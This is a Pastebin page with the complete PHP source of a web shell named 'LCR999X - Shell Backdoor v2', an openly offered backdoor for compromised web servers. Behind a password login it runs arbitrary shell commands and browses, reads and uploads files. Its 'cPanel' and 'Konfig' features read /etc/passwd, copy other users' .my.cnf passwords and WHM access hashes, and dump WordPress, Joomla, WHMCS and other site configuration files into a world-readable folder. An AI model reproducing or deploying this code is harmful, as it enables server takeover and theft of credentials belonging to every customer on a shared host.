Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- error_reporting(0);
- ?>
- <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN"
- "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
- <title><> LCR999X - Shell Backdoor v2 <></title>
- <link href="http://fonts.googleapis.com/css?family=Indie+Flower" rel="stylesheet" type="text/css">
- <style>
- body {background:#fafafa;color:#8b0000;padding-left:5px;padding-right:5px;font-family:Indie Flower;font-weight:bold;}
- a {text-decoration:none;color:#2F706C;}
- .aa {border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px}
- textarea {background:#000000;font-family:Indie Flower;border:1px solid #2D1F3B;margin:3px;padding:2px;height:200px;width:300px;color:#036564}
- input[type=submit] {background:none;font-family:Indie Flower;color:#AE8FBA;border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px}
- .t {color:#AE8FBA}
- input[type=file], input[type=text], input[type=password] {background:#fafafa;font-family:Indie Flower;color:#036564;border:1px solid #2D1F3B;margin:3px;padding:2px;height:21px;width:300px;}
- </style>
- <?php
- $pass="da0e22de18e3fbe1e96bdc882b912ea4";
- session_start();
- error_reporting(0);
- function demon(){
- echo '<center>• <> LCR999X ~ Shell Backdoor v2 <> •<br><form action="" method="post">
- <input type="password" style="width:250px" name="pass" value="" /> <input type="submit" value=" >> " name="submitlogin" />
- </form></center>';
- exit;
- }
- if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
- if(empty($pass)||(isset($_POST['pass'])&&(md5($_POST['pass'])==$pass)))$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
- else
- demon();
- if(isset($_GET['log'])&&($_GET['log']=='out')){ unset($_SESSION[md5($_SERVER['HTTP_HOST'])]); }
- if($_GET['path']){
- $path = $_GET['path'];
- } else {
- $path = getcwd();
- }
- error_reporting(0);
- $dir = str_replace('\\','/',$path);
- $paths = explode('/',$dir);
- $uname = php_uname();
- $os = PHP_OS;
- $ip = $_SERVER['SERVER_ADDR'];
- $id = getmyuid().'/'.getmygid();
- $soft = $_SERVER['SERVER_SOFTWARE'];
- $ver = phpversion();
- if(ini_get('safe_mode')==0){ $sm = "<font color='#EA5A6A'>OFF</font>"; } else { $sm = "ON"; }
- if(get_magic_quotes_gpc()=="1" or get_magic_quotes_gpc()=="on"){ $mq = "<font color='#EA5A6A'>OFF</font>"; } else { $mq = "ON"; }
- function exe($cmd){
- if(function_exists('system')) {
- @ob_start();
- @system($cmd);
- $buff = @ob_get_contents();
- @ob_end_clean();
- return $buff;
- }
- elseif(function_exists('exec')) {
- @exec($cmd,$results);
- $buff = "";
- foreach($results as $result){
- $buff .= $result;
- }
- return $buff;
- }
- elseif(function_exists('passthru')) {
- @ob_start();
- @passthru($cmd);
- $buff = @ob_get_contents();
- @ob_end_clean();
- return $buff;
- }
- elseif(function_exists('shell_exec')){
- $buff = @shell_exec($cmd);
- return $buff;
- }
- }
- if(function_exists('mysql_connect')){ $mysql = "ON"; } else { $mysql = "<font color='#EA5A6A'>OFF</font>"; }
- if(function_exists('curl_version')) { $curl = "ON"; } else { $curl = "<font color='#EA5A6A'>OFF</font>"; }
- if(exe('wget --help')) { $wget = "ON"; } else { $wget = "<font color='#EA5A6A'>OFF</font>"; }
- if(exe('perl -h')) { $perl = "ON"; } else { $perl = "<font color='#EA5A6A'>OFF</font>"; }
- if($disablefunc=@ini_get("disable_functions")){ $df = "ON"; }else { $df = "<font color='#EA5A6A'>OFF</font>"; }
- echo "<center><h2><> LCR999X ~ Shell Backdoor v2 <></h2></center><br>⊗≥ <font color='#629454'>UNAME :</font> $uname <br>";
- echo "⊗≥ <font color='#629454'>IP :</font> $ip $soft $os $ver ( $id )<br>";
- echo "⊗≥ <font color='#629454'>SAFEMODE :</font> $sm <br>⊗≥ <font color='#629454'><font color='#629454'>MAGIC :</font> $mq ‣ <font color='#629454'>MYSQL :</font> $mysql ‣ <font color='#629454'>DISFUNC :</font> $df ‣ <font color='#629454'>CURL :</font> $curl ‣ <font color='#629454'>WGET :</font> $wget<br>";
- echo "∫∫ <font color='#500000'>PATH :</font> ";
- foreach($paths as $id=>$pat){
- if($pat == '' && $id == 0){
- $a = true;
- echo '<a style="color:#F7C630;" href="?path=/"> ‣ </a>';
- continue;
- }
- if($pat == '') continue;
- echo '<a class="t" href="?path=';
- for($i=0;$i<=$id;$i++){
- echo "$paths[$i]";
- if($i != $id) echo "/";
- }
- echo '">'.$pat.'</a> ‣ ';
- }
- echo "<br><br><center><a class='aa' href='?upload&path=$path'>Unggah</a> <a class='aa' href='?jumping&path=$path'>Teleport</a> <a class='aa' href='?config'>Konfig</a> <a class='aa' href='?cpcrack'>cPanel</a></center><br>";
- if(isset($_GET['cpcrack'])){
- function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
- $ar0=explode($marqueurDebutLien, $text);
- $ar1=explode($marqueurFinLien, $ar0[$i]);
- return trim($ar1[0]);
- }
- echo '<br><br>';
- echo "<center>";
- $d0mains = @file('/etc/named.conf');
- $domains = scandir("/var/named");
- if ($domains or $d0mains)
- {
- $domains = scandir("/var/named");
- if($domains) {
- echo '<table border="0" cellpadding="3" cellspacing="1" align="center" ><tr><th style="border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px"> Domain </th><th style="border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px"> User </th><th style="border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px"> Pass </th><th style="border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px"> >> </th></tr>';
- $count=1;
- $dc = 0;
- $list = scandir("/var/named");
- foreach($list as $domain){
- if(strpos($domain,".db")){
- $domain = str_replace('.db','',$domain);
- $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
- $dirz = '/home/'.$owner['name'].'/.my.cnf';
- $path = getcwd();
- if (is_readable($dirz)) {
- copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
- $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
- $password=entre2v2($p,'password="','"');
- echo "<tr><td style='border-left:1px solid white;'><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td><td style='border-left:1px solid white;'>".$owner['name']."</td><td style=border-left:1px solid white;>".$password."</td><td style='border-left:1px solid white;'><a href='".$owner['name'].".txt' target='_blank'> >> </a></td></tr>";
- $dc++;
- }
- }
- }
- echo '</table>';
- $total = $dc;
- echo '<font color="#629454">Total cPanel Found :</font> '.$total.'<br />';
- echo '</center>';
- }else{
- $d0mains = @file('/etc/named.conf');
- if($d0mains) {
- echo '<table border="0" cellpadding="3" cellspacing="1" align="center" ><tr><th style="border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px"> Domain </th><th style="border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px"> User </th><th style="border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px"> Pass </th><th style="border:1px solid #2B4158;margin:3px;padding-left:3px;padding-right:3px;padding:4px"> >> </th></tr>';
- $count=1;
- $dc = 0;
- $mck = array();
- foreach($d0mains as $d0main){
- if(@eregi('zone',$d0main)){
- preg_match_all('#zone "(.*)"#',$d0main,$domain);
- flush();
- if(strlen(trim($domain[1][0])) >2){
- $mck[] = $domain[1][0];
- }
- }
- }
- $mck = array_unique($mck);
- $usr = array();
- $dmn = array();
- foreach($mck as $o) {
- $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
- $usr[] = $infos['name'];
- $dmn[] = $o;
- }
- array_multisort($usr,$dmn);
- $dt = file('/etc/passwd');
- $passwd = array();
- foreach($dt as $d) {
- $r = explode(':',$d);
- if(strpos($r[5],'home')) {
- $passwd[$r[0]] = $r[5];
- }
- }
- $l=0;
- $j=1;
- foreach($usr as $r) {
- $dirz = '/home/'.$r.'/.my.cnf';
- $path = getcwd();
- if (is_readable($dirz)) {
- copy($dirz, ''.$path.'/'.$r.'.txt');
- $p=file_get_contents(''.$path.'/'.$r.'.txt');
- $password=entre2v2($p,'password="','"');
- echo "<tr><td style='border-left:1px solid white;'><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td style=border-left:1px solid white;>'.$r."</td><td style=border-left:1px solid white;>".$password."</td><td style=border-left:1px solid white;><a href='".$r.".txt' target='_blank'> >> </a></td></tr>";
- $dc++;
- flush();
- $l=$l?0:1;
- $j++;
- }
- }
- }
- echo '</table>';
- $total = $dc;
- echo '<font color="#629454">Total cPanel Found :</font> '.$total.'<br />';
- echo '</center>';
- }
- }else{
- echo "</center><font color='#629454'>ERROR : </font>/var/named or etc/named.conf Not Accessible!";
- }
- exit;
- }
- if(isset($_GET['view'])){
- echo "<center><textarea>".htmlentities(file_get_contents($_GET['path'].'/'.$_GET['filename']))."</textarea></center>";
- exit;
- }
- if(isset($_GET['jumping'])){
- ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<br><font color="#AE8FBA">Error: safe_mode = on</font>');
- set_time_limit(0);
- @$passwd = fopen('/etc/passwd','r');
- if (!$passwd) { die('<br><font color="#AE8FBA">Error : coudn`t read /etc/passwd</font>'); }
- $pub = array();
- $users = array();
- $conf = array();
- $i = 0;
- while(!feof($passwd))
- {
- $str = fgets($passwd);
- if($i>35){
- $pos = strpos($str,':');
- $username = substr($str,0,$pos);
- $dirz = '/home/'.$username.'/public_html/';
- if(($username != '')){
- if(is_readable($dirz)){
- array_push($users,$username);
- array_push($pub,$dirz);
- }}}
- $i++;
- }
- echo "<br>‣ <font color='#629454'>Total :</font> ".sizeof($users)."/".sizeof($pub)." User";
- echo "<br><br>";
- foreach($users as $user){
- $path = "/home/$user/public_html/";
- echo " <table style='text-align:left'><tr><td style='text-align:left'> ";
- echo "• <a href='?path=$path'>$path</a><br>";
- echo " </td></tr></table> ";
- }
- exit;
- }
- // config by Indoxploit
- if(isset($_GET['config']))
- {
- $etc = fopen("/etc/passwd", "r");
- $idx = mkdir("lcr999x", 0777);
- $isi_htc = "Options all\nRequire None\nSatisfy Any";
- $htc = fopen("lcr999x/.htaccess","w");
- fwrite($htc, $isi_htc);
- while($passwd = fgets($etc)) {
- if($passwd == "" || !$etc) {
- echo "<font color=#AE8FBA>Can't read /etc/passwd</font>";
- } else {
- preg_match_all('/(.*?):x:/', $passwd, $user_config);
- foreach($user_config[1] as $user_idx){
- $user_config_dir = "/home/$user_idx/public_html/";
- if(is_readable($user_config_dir)) {
- $grab_config = array(
- "/home/$user_idx/.my.cnf" => "cpanel",
- "/home/$user_idx/.accesshash" => "WHM-accesshash",
- "/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb",
- "/home/$user_idx/public_html/config/koneksi.php" => "Lokomedia",
- "/home/$user_idx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
- "/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS",
- "/home/$user_idx/public_html/whm/configuration.php" => "WHMCS",
- "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS",
- "/home/$user_idx/public_html/forum/config.php" => "phpBB",
- "/home/$user_idx/public_html/sites/default/settings.php" => "Drupal",
- "/home/$user_idx/public_html/config/settings.inc.php" => "PrestaShop",
- "/home/$user_idx/public_html/app/etc/local.xml" => "Magento",
- "/home/$user_idx/public_html/joomla/configuration.php" => "Joomla",
- "/home/$user_idx/public_html/configuration.php" => "Joomla",
- "/home/$user_idx/public_html/wp/wp-config.php" => "WordPress",
- "/home/$user_idx/public_html/wordpress/wp-config.php" => "WordPress",
- "/home/$user_idx/public_html/wp-config.php" => "WordPress",
- "/home/$user_idx/public_html/admin/config.php" => "OpenCart",
- "/home/$user_idx/public_html/slconfig.php" => "Sitelok",
- "/home/$user_idx/public_html/application/config/database.php" => "Ellislab");
- foreach($grab_config as $config => $nama_config){
- $ambil_config = file_get_contents($config);
- if($ambil_config == ''){
- } else {
- $file_config = fopen("lcr999x/$user_idx-$nama_config.txt","w");
- fputs($file_config,$ambil_config);
- }}} }}}
- $path = getcwd();
- echo "‣<font color='629454'> Done :</font> <a href='?beby=exploler&path=$path$dir/lcr999x'>Click Here</a>";
- exit;
- }
- // uploader
- if(isset($_GET['upload'])){
- $path = $_GET['path'];
- echo '<center><form action="" method="post" enctype="multipart/form-data">
- <input type="file" name="file" /><br>
- <input type="text" name="ufile" placeholder="jkt48.php" /><br>
- <input name="upload" type="submit" value="Upload" /> <input type="submit" value="Reset" /> </form></center>';
- if(isset($_REQUEST['ufile'])){
- $ufile = $_POST['ufile'];
- }
- if(isset($_REQUEST['upload'])){
- if($_POST['upload']){
- if(@copy($_FILES['file']['tmp_name'],$path.'/'.$ufile)){
- $size = filesize($ufile);
- echo '<script>alert("#Dhetry.py\n\t [+] Name : '.$ufile.'\n\t [+] Size : '.$size.' Bytes\n\t [+] Status : Suksess !!\n\t [+] Path : '.$path.'/'.$ufile.'")</script>';
- echo "‣<font color='#629454'> Sucess :</font> <a href='#'>$ufile</a>";
- } else {
- $size = filesize($ufile);
- echo '<script>alert("#Dhetry.py\n\t [+] Name : '.$ufile.'\n\t [+] Size : '.$size.' Bytes\n\t [+] Status : Gagall !!!\n\t [+] Path : '.$path.'/'.$ufile.' ")</script>';
- echo "‣<font color='629454'> Gagal :</font> <a href='#'>$ufile</a>";
- }}}
- exit;
- }
- // scandir
- $files = scandir ($path);
- $direct = 0;
- foreach ($files as $out) {
- if(!is_dir("$path/$out") || $out == '.' || $out == '..') continue;
- echo '• <a href="?path='.$path.'/'.$out.'">'.$out.'</a><br>';
- }
- if(is_dir($path)){
- foreach ($files as $out) {
- if(!is_file("$path/$out") || $out == '.' || $out == '..') continue;
- echo '• <a href="?view&path='.$path.'&get='.$path.'/'.$out.'&filename='.$out.'">'.$out.'</a><br>';
- }
- }
- ?>
- <br>
- © Copyright 2018 LCR999X
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement